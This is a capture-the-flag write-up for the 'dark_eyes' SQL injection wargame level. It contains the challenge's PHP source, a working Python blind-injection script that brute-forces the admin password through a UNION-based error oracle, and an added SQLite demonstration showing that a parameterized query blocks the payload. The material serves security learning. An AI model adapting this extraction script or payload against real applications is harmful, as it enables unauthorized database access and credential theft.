LOS dark_eyes
WebHacking/Load Of Sql Injection 2018. 2. 18. 02:58

```php
<?php
include "./config.php";
login_chk();
dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
$result = @mysql_fetch_array(mysql_query($query));
if(mysql_error()) exit();
echo "<hr>query : <strong>{$query}</strong><hr><br>";

$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
$result = @mysql_fetch_array(mysql_query($query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("dark_eyes");
highlight_file(__FILE__);
?>
```
Like the previous challenge, this is an error-based blind SQL injection problem.
It can be solved by exploiting a property of UNION.
```python
import urllib2

j = 1            # 1-based position in pw currently being tested
input_ = 33 #0   # candidate byte value, starting at '!'
passwd = ''
while(True):
    url = 'https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=\' or id=\'admin\' and (select 1 union select substr(pw,%d,1)=0x%x)' %(j,input_)
    url += '%23'  # URL-encoded '#', comments out the trailing quote
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0')
    req.add_header('cookie','PHPSESSID=cou72qt1ouduhumnfslep8oaa2')
    data = urllib2.urlopen(req).read()
    # The page source (containing 'include') is only shown when the query did not error
    if 'include' in data:
        passwd += chr(input_)
        j += 1
        print 'Search Key is '+passwd
        print 'Search hex Key is %d'%(input_)
        if len(passwd) == 8:
            break
        input_= 33
    else:
        input_+=0x1
print 'Key is '+passwd
```

UNION has the property that when the combined result contains duplicate values, only the first of them is output.
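If the substr condition is true, the comparison returns 1, so the subquery becomes equivalent to select 1 union select 1, and because of UNION only a single 1 is output.
If it is false, 1 and 0 are output. The subquery then returns two rows where a single value is expected, MySQL raises an error, and the script stops at `if(mysql_error()) exit();`, so the response is empty. That is why the solver checks whether the string `include` from the highlighted source appears in the response.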
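The one-row versus two-row difference described above can be reproduced offline, together with the reason a bound parameter removes it; this is an added example, not code from the original post. It uses SQLite in place of MySQL with a constructed table and password, ports the two filter patterns from the challenge source, and all helper names are hypothetical. SQLite does not raise MySQL's "Subquery returns more than 1 row" error, so the block counts rows instead.

```python
import re
import sqlite3

# Constructed stand-in for the challenge table; the password is made up.
db = sqlite3.connect(":memory:")
db.execute("create table prob_dark_eyes (id text, pw text)")
db.execute("insert into prob_dark_eyes values ('admin', 'c0ffee12')")

# The two blacklists from the challenge source, ported to Python's re.
FILTERS = [re.compile(r"prob|_|\.|\(\)", re.I),
           re.compile(r"col|if|case|when|sleep|benchmark", re.I)]

# Payload shape used by the post's script (position 1, byte 0x63).
PAYLOAD = "' or id='admin' and (select 1 union select substr(pw,1,1)=0x63)#"

def passes_filters(pw):
    """True when neither blacklist matches, i.e. the input reaches the query."""
    return not any(f.search(pw) for f in FILTERS)

def subquery_rows(pos, char):
    """Row count of `select 1 union select substr(pw,pos,1)=char` for admin."""
    sql = ("select count(*) from (select 1 union "
           "select substr(pw, ?, 1) = ? from prob_dark_eyes where id = 'admin')")
    return db.execute(sql, (pos, char)).fetchone()[0]

def mysql_would_error(pos, char):
    """Emulates MySQL rejecting a scalar subquery that yields more than one row."""
    return subquery_rows(pos, char) > 1

def login_parameterized(pw):
    """Hardened lookup: pw is bound as data and never parsed as SQL."""
    row = db.execute("select id from prob_dark_eyes where id = 'admin' and pw = ?",
                     (pw,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    print("payload passes both blacklists:", passes_filters(PAYLOAD))
    print("right guess rows:", subquery_rows(1, "c"))
    print("wrong guess rows:", subquery_rows(1, "x"))
    print("payload against bound query:", login_parameterized(PAYLOAD))
```

The keyword blacklists let the payload through unchanged, while the parameterized lookup returns nothing for it, which is the fix that holds regardless of which SQL keywords are filtered.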